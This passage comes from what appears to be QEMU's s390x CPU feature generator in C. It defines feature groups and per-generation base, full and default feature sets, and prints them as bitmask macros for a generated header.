S390_FEAT_KM_DEA, \ S390_FEAT_KM_TDEA_128, \ S390_FEAT_KM_TDEA_192, \ S390_FEAT_KIMD_SHA_1, \ S390_FEAT_KLMD_SHA_1 #define S390_FEAT_GROUP_MSA_EXT_1 \ S390_FEAT_KMC_AES_128, \ S390_FEAT_KM_AES_128, \ S390_FEAT_KIMD_SHA_256, \ S390_FEAT_KLMD_SHA_256 #define S390_FEAT_GROUP_MSA_EXT_2 \ S390_FEAT_KMC_AES_192, \ S390_FEAT_KMC_AES_256, \ S390_FEAT_KMC_PRNG, \ S390_FEAT_KM_AES_192, \ S390_FEAT_KM_AES_256, \ S390_FEAT_KIMD_SHA_512, \ S390_FEAT_KLMD_SHA_512 #define S390_FEAT_GROUP_MSA_EXT_3 \ S390_FEAT_MSA_EXT_3, \ S390_FEAT_KMAC_EDEA, \ S390_FEAT_KMAC_ETDEA_128, \ S390_FEAT_KMAC_ETDEA_192, \ S390_FEAT_KMC_EAES_128, \ S390_FEAT_KMC_EAES_192, \ S390_FEAT_KMC_EAES_256, \ S390_FEAT_KMC_EDEA, \ S390_FEAT_KMC_ETDEA_128, \ S390_FEAT_KMC_ETDEA_192, \ S390_FEAT_KM_EDEA, \ S390_FEAT_KM_ETDEA_128, \ S390_FEAT_KM_ETDEA_192, \ S390_FEAT_KM_EAES_128, \ S390_FEAT_KM_EAES_192, \ S390_FEAT_KM_EAES_256, \ S390_FEAT_PCKMO_EDEA, \ S390_FEAT_PCKMO_ETDEA_128, \ S390_FEAT_PCKMO_ETDEA_256, \ S390_FEAT_PCKMO_AES_128, \ S390_FEAT_PCKMO_AES_192, \ S390_FEAT_PCKMO_AES_256 #define S390_FEAT_GROUP_MSA_EXT_4 \ S390_FEAT_MSA_EXT_4, \ S390_FEAT_KMAC_AES_128, \ S390_FEAT_KMAC_AES_192, \ S390_FEAT_KMAC_AES_256, \ S390_FEAT_KMAC_EAES_128, \ S390_FEAT_KMAC_EAES_192, \ S390_FEAT_KMAC_EAES_256, \ S390_FEAT_KM_XTS_AES_128, \ S390_FEAT_KM_XTS_AES_256, \ S390_FEAT_KM_XTS_EAES_128, \ S390_FEAT_KM_XTS_EAES_256, \ S390_FEAT_KIMD_GHASH, \ S390_FEAT_KMCTR_DEA, \ S390_FEAT_KMCTR_TDEA_128, \ S390_FEAT_KMCTR_TDEA_192, \ S390_FEAT_KMCTR_EDEA, \ S390_FEAT_KMCTR_ETDEA_128, \ S390_FEAT_KMCTR_ETDEA_192, \ S390_FEAT_KMCTR_AES_128, \ S390_FEAT_KMCTR_AES_192, \ S390_FEAT_KMCTR_AES_256, \ S390_FEAT_KMCTR_EAES_128, \ S390_FEAT_KMCTR_EAES_192, \ S390_FEAT_KMCTR_EAES_256, \ S390_FEAT_KMF_DEA, \ S390_FEAT_KMF_TDEA_128, \ S390_FEAT_KMF_TDEA_192, \ S390_FEAT_KMF_EDEA, \ S390_FEAT_KMF_ETDEA_128, \ S390_FEAT_KMF_ETDEA_192, \ S390_FEAT_KMF_AES_128, \ S390_FEAT_KMF_AES_192, \ S390_FEAT_KMF_AES_256, \ S390_FEAT_KMF_EAES_128, \ S390_FEAT_KMF_EAES_192, \ S390_FEAT_KMF_EAES_256, \ S390_FEAT_KMO_DEA, \ S390_FEAT_KMO_TDEA_128, \ S390_FEAT_KMO_TDEA_192, \ S390_FEAT_KMO_EDEA, \ S390_FEAT_KMO_ETDEA_128, \ S390_FEAT_KMO_ETDEA_192, \ 
S390_FEAT_KMO_AES_128, \ S390_FEAT_KMO_AES_192, \ S390_FEAT_KMO_AES_256, \ S390_FEAT_KMO_EAES_128, \ S390_FEAT_KMO_EAES_192, \ S390_FEAT_KMO_EAES_256, \ S390_FEAT_PCC_CMAC_DEA, \ S390_FEAT_PCC_CMAC_TDEA_128, \ S390_FEAT_PCC_CMAC_TDEA_192, \ S390_FEAT_PCC_CMAC_ETDEA_128, \ S390_FEAT_PCC_CMAC_ETDEA_192, \ S390_FEAT_PCC_CMAC_TDEA, \ S390_FEAT_PCC_CMAC_AES_128, \ S390_FEAT_PCC_CMAC_AES_192, \ S390_FEAT_PCC_CMAC_AES_256, \ S390_FEAT_PCC_CMAC_EAES_128, \ S390_FEAT_PCC_CMAC_EAES_192, \ S390_FEAT_PCC_CMAC_EAES_256, \ S390_FEAT_PCC_XTS_AES_128, \ S390_FEAT_PCC_XTS_AES_256, \ S390_FEAT_PCC_XTS_EAES_128, \ S390_FEAT_PCC_XTS_EAES_256 #define S390_FEAT_GROUP_MSA_EXT_5 \ S390_FEAT_MSA_EXT_5, \ S390_FEAT_PPNO_SHA_512_DRNG #define S390_FEAT_GROUP_MSA_EXT_6 \ S390_FEAT_KIMD_SHA3_224, \ S390_FEAT_KIMD_SHA3_256, \ S390_FEAT_KIMD_SHA3_384, \ S390_FEAT_KIMD_SHA3_512, \ S390_FEAT_KIMD_SHAKE_128, \ S390_FEAT_KIMD_SHAKE_256, \ S390_FEAT_KLMD_SHA3_224, \ S390_FEAT_KLMD_SHA3_256, \ S390_FEAT_KLMD_SHA3_384, \ S390_FEAT_KLMD_SHA3_512, \ S390_FEAT_KLMD_SHAKE_128, \ S390_FEAT_KLMD_SHAKE_256 #define S390_FEAT_GROUP_MSA_EXT_7 \ S390_FEAT_PRNO_TRNG_QRTCR, \ S390_FEAT_PRNO_TRNG #define S390_FEAT_GROUP_MSA_EXT_8 \ S390_FEAT_MSA_EXT_8, \ S390_FEAT_KMA_GCM_AES_128, \ S390_FEAT_KMA_GCM_AES_192, \ S390_FEAT_KMA_GCM_AES_256 , \ S390_FEAT_KMA_GCM_EAES_128, \ S390_FEAT_KMA_GCM_EAES_192, \ S390_FEAT_KMA_GCM_EAES_256 #define S390_FEAT_GROUP_MSA_EXT_9 \ S390_FEAT_MSA_EXT_9, \ S390_FEAT_KDSA_ECDSA_VERIFY_P256, \ S390_FEAT_KDSA_ECDSA_VERIFY_P384, \ S390_FEAT_KDSA_ECDSA_VERIFY_P512, \ S390_FEAT_KDSA_ECDSA_SIGN_P256, \ S390_FEAT_KDSA_ECDSA_SIGN_P384, \ S390_FEAT_KDSA_ECDSA_SIGN_P512, \ S390_FEAT_KDSA_EECDSA_SIGN_P256, \ S390_FEAT_KDSA_EECDSA_SIGN_P384, \ S390_FEAT_KDSA_EECDSA_SIGN_P512, \ S390_FEAT_KDSA_EDDSA_VERIFY_ED25519, \ S390_FEAT_KDSA_EDDSA_VERIFY_ED448, \ S390_FEAT_KDSA_EDDSA_SIGN_ED25519, \ S390_FEAT_KDSA_EDDSA_SIGN_ED448, \ S390_FEAT_KDSA_EEDDSA_SIGN_ED25519, \ S390_FEAT_KDSA_EEDDSA_SIGN_ED448, \ S390_FEAT_PCC_SCALAR_MULT_P256, \ S390_FEAT_PCC_SCALAR_MULT_P384, \ S390_FEAT_PCC_SCALAR_MULT_P512, \ S390_FEAT_PCC_SCALAR_MULT_ED25519, \ S390_FEAT_PCC_SCALAR_MULT_ED448, \ S390_FEAT_PCC_SCALAR_MULT_X25519, \ S390_FEAT_PCC_SCALAR_MULT_X448 #define S390_FEAT_GROUP_MSA_EXT_9_PCKMO \ S390_FEAT_PCKMO_ECC_P256, \ S390_FEAT_PCKMO_ECC_P384, \ S390_FEAT_PCKMO_ECC_P521, \ S390_FEAT_PCKMO_ECC_ED25519, \ S390_FEAT_PCKMO_ECC_ED448 #define S390_FEAT_GROUP_ENH_SORT \ S390_FEAT_ESORT_BASE, \ S390_FEAT_SORTL_SFLR, \ S390_FEAT_SORTL_SVLR, \ S390_FEAT_SORTL_32, \ S390_FEAT_SORTL_128, \ S390_FEAT_SORTL_F0 #define S390_FEAT_GROUP_DEFLATE_CONVERSION \ S390_FEAT_DEFLATE_BASE, \ S390_FEAT_DEFLATE_GHDT, \ S390_FEAT_DEFLATE_CMPR, \ S390_FEAT_DEFLATE_XPND, \ S390_FEAT_DEFLATE_F0 /* cpu feature groups */ static uint16_t group_PLO[] = { S390_FEAT_GROUP_PLO, }; static uint16_t group_TOD_CLOCK_STEERING[] = { S390_FEAT_GROUP_TOD_CLOCK_STEERING, }; static uint16_t group_GEN13_PTFF[] = { S390_FEAT_GROUP_GEN13_PTFF, }; static uint16_t group_MULTIPLE_EPOCH_PTFF[] = { S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; static uint16_t group_MSA[] = { S390_FEAT_GROUP_MSA, }; static uint16_t group_MSA_EXT_1[] = { S390_FEAT_GROUP_MSA_EXT_1, }; static uint16_t group_MSA_EXT_2[] = { S390_FEAT_GROUP_MSA_EXT_2, }; static uint16_t group_MSA_EXT_3[] = { S390_FEAT_GROUP_MSA_EXT_3, }; static uint16_t group_MSA_EXT_4[] = { S390_FEAT_GROUP_MSA_EXT_4, }; static uint16_t group_MSA_EXT_5[] = { S390_FEAT_GROUP_MSA_EXT_5, }; static uint16_t group_MSA_EXT_6[] = { S390_FEAT_GROUP_MSA_EXT_6, }; static 
uint16_t group_MSA_EXT_7[] = { S390_FEAT_GROUP_MSA_EXT_7, }; static uint16_t group_MSA_EXT_8[] = { S390_FEAT_GROUP_MSA_EXT_8, }; static uint16_t group_MSA_EXT_9[] = { S390_FEAT_GROUP_MSA_EXT_9, }; static uint16_t group_MSA_EXT_9_PCKMO[] = { S390_FEAT_GROUP_MSA_EXT_9_PCKMO, }; static uint16_t group_ENH_SORT[] = { S390_FEAT_GROUP_ENH_SORT, }; static uint16_t group_DEFLATE_CONVERSION[] = { S390_FEAT_GROUP_DEFLATE_CONVERSION, }; /* Base features (in order of release) * Only non-hypervisor managed features belong here. * Base feature sets are static meaning they do not change in future QEMU * releases. */ static uint16_t base_GEN7_GA1[] = { S390_FEAT_GROUP_PLO, S390_FEAT_ESAN3, S390_FEAT_ZARCH, }; #define base_GEN7_GA2 EmptyFeat #define base_GEN7_GA3 EmptyFeat static uint16_t base_GEN8_GA1[] = { S390_FEAT_DAT_ENH, S390_FEAT_EXTENDED_TRANSLATION_2, S390_FEAT_GROUP_MSA, S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_LONG_DISPLACEMENT_FAST, S390_FEAT_HFP_MADDSUB, }; #define base_GEN8_GA2 EmptyFeat #define base_GEN8_GA3 EmptyFeat #define base_GEN8_GA4 EmptyFeat #define base_GEN8_GA5 EmptyFeat static uint16_t base_GEN9_GA1[] = { S390_FEAT_IDTE_SEGMENT, S390_FEAT_ASN_LX_REUSE, S390_FEAT_STFLE, S390_FEAT_SENSE_RUNNING_STATUS, S390_FEAT_EXTENDED_IMMEDIATE, S390_FEAT_EXTENDED_TRANSLATION_3, S390_FEAT_HFP_UNNORMALIZED_EXT, S390_FEAT_ETF2_ENH, S390_FEAT_STORE_CLOCK_FAST, S390_FEAT_GROUP_TOD_CLOCK_STEERING, S390_FEAT_ETF3_ENH, S390_FEAT_DAT_ENH_2, }; #define base_GEN9_GA2 EmptyFeat #define base_GEN9_GA3 EmptyFeat static uint16_t base_GEN10_GA1[] = { S390_FEAT_CONDITIONAL_SSKE, S390_FEAT_PARSING_ENH, S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2, S390_FEAT_GENERAL_INSTRUCTIONS_EXT, S390_FEAT_EXECUTE_EXT, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_DFP, S390_FEAT_DFP_FAST, S390_FEAT_PFPO, }; #define base_GEN10_GA2 EmptyFeat #define base_GEN10_GA3 EmptyFeat static uint16_t base_GEN11_GA1[] = { S390_FEAT_NONQ_KEY_SETTING, S390_FEAT_ENHANCED_MONITOR, S390_FEAT_FLOATING_POINT_EXT, S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_STFLE_45, S390_FEAT_CMPSC_ENH, S390_FEAT_INTERLOCKED_ACCESS_2, }; #define base_GEN11_GA2 EmptyFeat static uint16_t base_GEN12_GA1[] = { S390_FEAT_DFP_ZONED_CONVERSION, S390_FEAT_STFLE_49, S390_FEAT_LOCAL_TLB_CLEARING, }; #define base_GEN12_GA2 EmptyFeat static uint16_t base_GEN13_GA1[] = { S390_FEAT_STFLE_53, S390_FEAT_DFP_PACKED_CONVERSION, S390_FEAT_GROUP_GEN13_PTFF, }; #define base_GEN13_GA2 EmptyFeat static uint16_t base_GEN14_GA1[] = { S390_FEAT_ENTROPY_ENC_COMP, S390_FEAT_MISC_INSTRUCTION_EXT, S390_FEAT_SEMAPHORE_ASSIST, S390_FEAT_TIME_SLICE_INSTRUMENTATION, S390_FEAT_ORDER_PRESERVING_COMPRESSION, }; #define base_GEN14_GA2 EmptyFeat static uint16_t base_GEN15_GA1[] = { S390_FEAT_MISC_INSTRUCTION_EXT3, }; /* Full features (in order of release) * Automatically includes corresponding base features. * Full features are all features this hardware supports even if kvm/QEMU do not * support these features yet. 
*/ static uint16_t full_GEN7_GA1[] = { S390_FEAT_PPA15, S390_FEAT_BPB, S390_FEAT_SIE_F2, S390_FEAT_SIE_SKEY, S390_FEAT_SIE_GPERE, S390_FEAT_SIE_IB, S390_FEAT_SIE_CEI, }; static uint16_t full_GEN7_GA2[] = { S390_FEAT_EXTENDED_TRANSLATION_2, }; static uint16_t full_GEN7_GA3[] = { S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_SIE_SIIF, }; static uint16_t full_GEN8_GA1[] = { S390_FEAT_SIE_GSLS, S390_FEAT_SIE_64BSCAO, }; #define full_GEN8_GA2 EmptyFeat static uint16_t full_GEN8_GA3[] = { S390_FEAT_ASN_LX_REUSE, S390_FEAT_EXTENDED_TRANSLATION_3, }; #define full_GEN8_GA4 EmptyFeat #define full_GEN8_GA5 EmptyFeat static uint16_t full_GEN9_GA1[] = { S390_FEAT_STORE_HYPERVISOR_INFO, S390_FEAT_GROUP_MSA_EXT_1, S390_FEAT_CMM, S390_FEAT_SIE_CMMA, }; static uint16_t full_GEN9_GA2[] = { S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_DFP, }; static uint16_t full_GEN9_GA3[] = { S390_FEAT_CONDITIONAL_SSKE, S390_FEAT_PFPO, }; static uint16_t full_GEN10_GA1[] = { S390_FEAT_EDAT, S390_FEAT_CONFIGURATION_TOPOLOGY, S390_FEAT_GROUP_MSA_EXT_2, S390_FEAT_ESOP, S390_FEAT_SIE_PFMFI, S390_FEAT_SIE_SIGPIF, }; static uint16_t full_GEN10_GA2[] = { S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_SIE_IBS, }; static uint16_t full_GEN10_GA3[] = { S390_FEAT_GROUP_MSA_EXT_3, }; static uint16_t full_GEN11_GA1[] = { S390_FEAT_IPTE_RANGE, S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_GROUP_MSA_EXT_4, }; #define full_GEN11_GA2 EmptyFeat static uint16_t full_GEN12_GA1[] = { S390_FEAT_CONSTRAINT_TRANSACTIONAL_EXE, S390_FEAT_TRANSACTIONAL_EXE, S390_FEAT_RUNTIME_INSTRUMENTATION, S390_FEAT_ZPCI, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_ADAPTER_INT_SUPPRESSION, S390_FEAT_EDAT_2, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, S390_FEAT_AP_QUERY_CONFIG_INFO, S390_FEAT_AP_QUEUE_INTERRUPT_CONTROL, S390_FEAT_AP_FACILITIES_TEST, S390_FEAT_AP, }; static uint16_t full_GEN12_GA2[] = { S390_FEAT_GROUP_MSA_EXT_5, }; static uint16_t full_GEN13_GA1[] = { S390_FEAT_VECTOR, }; #define full_GEN13_GA2 EmptyFeat static uint16_t full_GEN14_GA1[] = { S390_FEAT_INSTRUCTION_EXEC_PROT, S390_FEAT_GUARDED_STORAGE, S390_FEAT_VECTOR_PACKED_DECIMAL, S390_FEAT_VECTOR_ENH, S390_FEAT_MULTIPLE_EPOCH, S390_FEAT_TEST_PENDING_EXT_INTERRUPTION, S390_FEAT_INSERT_REFERENCE_BITS_MULT, S390_FEAT_GROUP_MSA_EXT_6, S390_FEAT_GROUP_MSA_EXT_7, S390_FEAT_GROUP_MSA_EXT_8, S390_FEAT_CMM_NT, S390_FEAT_ETOKEN, S390_FEAT_HPMA2, S390_FEAT_SIE_KSS, S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; #define full_GEN14_GA2 EmptyFeat static uint16_t full_GEN15_GA1[] = { S390_FEAT_VECTOR_ENH2, S390_FEAT_GROUP_ENH_SORT, S390_FEAT_GROUP_DEFLATE_CONVERSION, S390_FEAT_VECTOR_PACKED_DECIMAL_ENH, S390_FEAT_GROUP_MSA_EXT_9, S390_FEAT_GROUP_MSA_EXT_9_PCKMO, S390_FEAT_ETOKEN, }; /* Default features (in order of release) * Automatically includes corresponding base features. * Default features are all features this version of QEMU supports for this * hardware model. Default feature sets can grow with new QEMU releases. 
*/ #define default_GEN7_GA1 EmptyFeat #define default_GEN7_GA2 EmptyFeat #define default_GEN7_GA3 EmptyFeat #define default_GEN8_GA1 EmptyFeat #define default_GEN8_GA2 EmptyFeat #define default_GEN8_GA3 EmptyFeat #define default_GEN8_GA4 EmptyFeat #define default_GEN8_GA5 EmptyFeat static uint16_t default_GEN9_GA1[] = { S390_FEAT_STORE_HYPERVISOR_INFO, S390_FEAT_GROUP_MSA_EXT_1, S390_FEAT_CMM, }; #define default_GEN9_GA2 EmptyFeat #define default_GEN9_GA3 EmptyFeat static uint16_t default_GEN10_GA1[] = { S390_FEAT_EDAT, S390_FEAT_GROUP_MSA_EXT_2, }; #define default_GEN10_GA2 EmptyFeat #define default_GEN10_GA3 EmptyFeat static uint16_t default_GEN11_GA1[] = { S390_FEAT_GROUP_MSA_EXT_3, S390_FEAT_IPTE_RANGE, S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_GROUP_MSA_EXT_4, S390_FEAT_PPA15, S390_FEAT_BPB, }; #define default_GEN11_GA2 EmptyFeat static uint16_t default_GEN12_GA1[] = { S390_FEAT_CONSTRAINT_TRANSACTIONAL_EXE, S390_FEAT_TRANSACTIONAL_EXE, S390_FEAT_RUNTIME_INSTRUMENTATION, S390_FEAT_ZPCI, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_EDAT_2, S390_FEAT_ESOP, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, }; #define default_GEN12_GA2 EmptyFeat static uint16_t default_GEN13_GA1[] = { S390_FEAT_GROUP_MSA_EXT_5, S390_FEAT_VECTOR, }; #define default_GEN13_GA2 EmptyFeat static uint16_t default_GEN14_GA1[] = { S390_FEAT_INSTRUCTION_EXEC_PROT, S390_FEAT_GUARDED_STORAGE, S390_FEAT_VECTOR_PACKED_DECIMAL, S390_FEAT_VECTOR_ENH, S390_FEAT_GROUP_MSA_EXT_6, S390_FEAT_GROUP_MSA_EXT_7, S390_FEAT_GROUP_MSA_EXT_8, S390_FEAT_MULTIPLE_EPOCH, S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; #define default_GEN14_GA2 EmptyFeat static uint16_t default_GEN15_GA1[] = { S390_FEAT_VECTOR_ENH2, S390_FEAT_GROUP_DEFLATE_CONVERSION, S390_FEAT_VECTOR_PACKED_DECIMAL_ENH, S390_FEAT_GROUP_MSA_EXT_9, S390_FEAT_GROUP_MSA_EXT_9_PCKMO, S390_FEAT_ETOKEN, }; /* QEMU (CPU model) features */ static uint16_t qemu_V2_11[] = { S390_FEAT_GROUP_PLO, S390_FEAT_ESAN3, S390_FEAT_ZARCH, }; static uint16_t qemu_V3_1[] = { S390_FEAT_DAT_ENH, S390_FEAT_IDTE_SEGMENT, S390_FEAT_STFLE, S390_FEAT_SENSE_RUNNING_STATUS, S390_FEAT_EXTENDED_TRANSLATION_2, S390_FEAT_MSA, S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_LONG_DISPLACEMENT_FAST, S390_FEAT_EXTENDED_IMMEDIATE, S390_FEAT_EXTENDED_TRANSLATION_3, S390_FEAT_ETF2_ENH, S390_FEAT_STORE_CLOCK_FAST, S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_ETF3_ENH, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2, S390_FEAT_GENERAL_INSTRUCTIONS_EXT, S390_FEAT_EXECUTE_EXT, S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_STFLE_45, S390_FEAT_STFLE_49, S390_FEAT_LOCAL_TLB_CLEARING, S390_FEAT_INTERLOCKED_ACCESS_2, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_ADAPTER_INT_SUPPRESSION, S390_FEAT_MSA_EXT_3, S390_FEAT_MSA_EXT_4, }; static uint16_t qemu_V4_0[] = { /* * Only BFP bits are implemented (HFP, DFP, PFPO and DIVIDE TO INTEGER not * implemented yet). 
*/ S390_FEAT_FLOATING_POINT_EXT, S390_FEAT_ZPCI, }; static uint16_t qemu_V4_1[] = { S390_FEAT_STFLE_53, S390_FEAT_VECTOR, }; static uint16_t qemu_LATEST[] = { S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, S390_FEAT_ESOP, }; /* add all new definitions before this point */ static uint16_t qemu_MAX[] = { /* generates a dependency warning, leave it out for now */ S390_FEAT_MSA_EXT_5, /* features introduced after the z13 */ S390_FEAT_INSTRUCTION_EXEC_PROT, }; /****** END FEATURE DEFS ******/ #define _YEARS "2016" #define _NAME_H "TARGET_S390X_GEN_FEATURES_H" #define CPU_FEAT_INITIALIZER(_name) \ { \ .name = "S390_FEAT_LIST_" #_name, \ .base_bits = \ { .data = base_##_name, \ .len = ARRAY_SIZE(base_##_name) }, \ .default_bits = \ { .data = default_##_name, \ .len = ARRAY_SIZE(default_##_name) }, \ .full_bits = \ { .data = full_##_name, \ .len = ARRAY_SIZE(full_##_name) }, \ } typedef struct BitSpec { uint16_t *data; uint32_t len; } BitSpec; typedef struct { const char *name; BitSpec base_bits; BitSpec default_bits; BitSpec full_bits; } CpuFeatDefSpec; static uint16_t EmptyFeat[] = {}; /******************************* * processor GA series *******************************/ static CpuFeatDefSpec CpuFeatDef[] = { CPU_FEAT_INITIALIZER(GEN7_GA1), CPU_FEAT_INITIALIZER(GEN7_GA2), CPU_FEAT_INITIALIZER(GEN7_GA3), CPU_FEAT_INITIALIZER(GEN8_GA1), CPU_FEAT_INITIALIZER(GEN8_GA2), CPU_FEAT_INITIALIZER(GEN8_GA3), CPU_FEAT_INITIALIZER(GEN8_GA4), CPU_FEAT_INITIALIZER(GEN8_GA5), CPU_FEAT_INITIALIZER(GEN9_GA1), CPU_FEAT_INITIALIZER(GEN9_GA2), CPU_FEAT_INITIALIZER(GEN9_GA3), CPU_FEAT_INITIALIZER(GEN10_GA1), CPU_FEAT_INITIALIZER(GEN10_GA2), CPU_FEAT_INITIALIZER(GEN10_GA3), CPU_FEAT_INITIALIZER(GEN11_GA1), CPU_FEAT_INITIALIZER(GEN11_GA2), CPU_FEAT_INITIALIZER(GEN12_GA1), CPU_FEAT_INITIALIZER(GEN12_GA2), CPU_FEAT_INITIALIZER(GEN13_GA1), CPU_FEAT_INITIALIZER(GEN13_GA2), CPU_FEAT_INITIALIZER(GEN14_GA1), CPU_FEAT_INITIALIZER(GEN14_GA2), CPU_FEAT_INITIALIZER(GEN15_GA1), }; #define FEAT_GROUP_INITIALIZER(_name) \ { \ .name = "S390_FEAT_GROUP_LIST_" #_name, \ .enum_name = "S390_FEAT_GROUP_" #_name, \ .bits = \ { .data = group_##_name, \ .len = ARRAY_SIZE(group_##_name) }, \ } typedef struct { const char *name; const char *enum_name; BitSpec bits; } FeatGroupDefSpec; /******************************* * feature groups *******************************/ static FeatGroupDefSpec FeatGroupDef[] = { FEAT_GROUP_INITIALIZER(PLO), FEAT_GROUP_INITIALIZER(TOD_CLOCK_STEERING), FEAT_GROUP_INITIALIZER(GEN13_PTFF), FEAT_GROUP_INITIALIZER(MSA), FEAT_GROUP_INITIALIZER(MSA_EXT_1), FEAT_GROUP_INITIALIZER(MSA_EXT_2), FEAT_GROUP_INITIALIZER(MSA_EXT_3), FEAT_GROUP_INITIALIZER(MSA_EXT_4), FEAT_GROUP_INITIALIZER(MSA_EXT_5), FEAT_GROUP_INITIALIZER(MSA_EXT_6), FEAT_GROUP_INITIALIZER(MSA_EXT_7), FEAT_GROUP_INITIALIZER(MSA_EXT_8), FEAT_GROUP_INITIALIZER(MSA_EXT_9), FEAT_GROUP_INITIALIZER(MSA_EXT_9_PCKMO), FEAT_GROUP_INITIALIZER(MULTIPLE_EPOCH_PTFF), FEAT_GROUP_INITIALIZER(ENH_SORT), FEAT_GROUP_INITIALIZER(DEFLATE_CONVERSION), }; #define QEMU_FEAT_INITIALIZER(_name) \ { \ .name = "S390_FEAT_LIST_QEMU_" #_name, \ .bits = \ { .data = qemu_##_name, \ .len = ARRAY_SIZE(qemu_##_name) }, \ } /******************************* * QEMU (CPU model) features *******************************/ static FeatGroupDefSpec QemuFeatDef[] = { QEMU_FEAT_INITIALIZER(V2_11), QEMU_FEAT_INITIALIZER(V3_1), QEMU_FEAT_INITIALIZER(V4_0), QEMU_FEAT_INITIALIZER(V4_1), QEMU_FEAT_INITIALIZER(LATEST), QEMU_FEAT_INITIALIZER(MAX), }; static void set_bits(uint64_t 
list[], BitSpec bits) { uint32_t i; for (i = 0; i < bits.len; i++) { list[bits.data[i] / 64] |= 1ULL << (bits.data[i] % 64); } } static inline void clear_bit(uint64_t list[], unsigned long nr) { list[nr / 64] &= ~(1ULL << (nr % 64)); } static void print_feature_defs(void) { uint64_t base_feat[S390_FEAT_MAX / 64 + 1] = {}; uint64_t default_feat[S390_FEAT_MAX / 64 + 1] = {}; uint64_t full_feat[S390_FEAT_MAX / 64 + 1] = {}; int i, j; printf("\n/* CPU model feature list data */\n"); for (i = 0; i < ARRAY_SIZE(CpuFeatDef); i++) { /* With gen15 CSSKE and BPB are deprecated */ if (strcmp(CpuFeatDef[i].name, "S390_FEAT_LIST_GEN15_GA1") == 0) { clear_bit(base_feat, S390_FEAT_CONDITIONAL_SSKE); clear_bit(default_feat, S390_FEAT_CONDITIONAL_SSKE); clear_bit(default_feat, S390_FEAT_BPB); } set_bits(base_feat, CpuFeatDef[i].base_bits); /* add the base to the default features */ set_bits(default_feat, CpuFeatDef[i].base_bits); set_bits(default_feat, CpuFeatDef[i].default_bits); /* add the base to the full features */ set_bits(full_feat, CpuFeatDef[i].base_bits); set_bits(full_feat, CpuFeatDef[i].full_bits); printf("#define %s_BASE\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(base_feat); j++) { printf("0x%016"PRIx64"ULL", base_feat[j]); if (j < ARRAY_SIZE(base_feat) - 1) { printf(","); } else { printf("\n"); } } printf("#define %s_DEFAULT\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(default_feat); j++) { printf("0x%016"PRIx64"ULL", default_feat[j]); if (j < ARRAY_SIZE(default_feat) - 1) { printf(","); } else { printf("\n"); } } printf("#define %s_FULL\t\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(full_feat); j++) { printf("0x%016"PRIx64"ULL", full_feat[j]); if (j < ARRAY_SIZE(full_feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_qemu_feature_defs(void) { uint64_t feat[S390_FEAT_MAX / 64 + 1] = {}; int i, j; printf("\n/* QEMU (CPU model) feature list data */\n"); /* for now we assume that we only add new features */ for (i = 0; i < ARRAY_SIZE(QemuFeatDef); i++) { set_bits(feat, QemuFeatDef[i].bits); printf("#define %s\t", QemuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(feat); j++) { printf("0x%016"PRIx64"ULL", feat[j]); if (j < ARRAY_SIZE(feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_feature_group_defs(void) { int i, j; printf("\n/* CPU feature group list data */\n"); for (i = 0; i < ARRAY_SIZE(FeatGroupDef); i++) { uint64_t feat[S390_FEAT_MAX / 64 + 1] = {}; set_bits(feat, FeatGroupDef[i].bits); printf("#define %s\t", FeatGroupDef[i].name); for (j = 0; j < ARRAY_SIZE(feat); j++) { printf("0x%016"PRIx64"ULL", feat[j]); if (j < ARRAY_SIZE(feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_feature_group_enum_type(void) { int i; printf("\n/* CPU feature group enum type */\n" "typedef enum {\n"); for (i = 0; i < ARRAY_SIZE(FeatGroupDef); i++) { printf("\t%s,\n", FeatGroupDef[i].enum_name); } printf("\tS390_FEAT_GROUP_MAX,\n" "} S390FeatGroup;\n"); } int main(int argc, char *argv[]) { printf("/*\n" " * AUTOMATICALLY GENERATED, DO NOT MODIFY HERE, EDIT\n" " * SOURCE FILE \"%s\" INSTEAD.\n" " *\n" " * Copyright %s IBM Corp.\n" " *\n" " * This work is licensed under the terms of the GNU GPL, " "version 2 or (at\n * your option) any later version. 
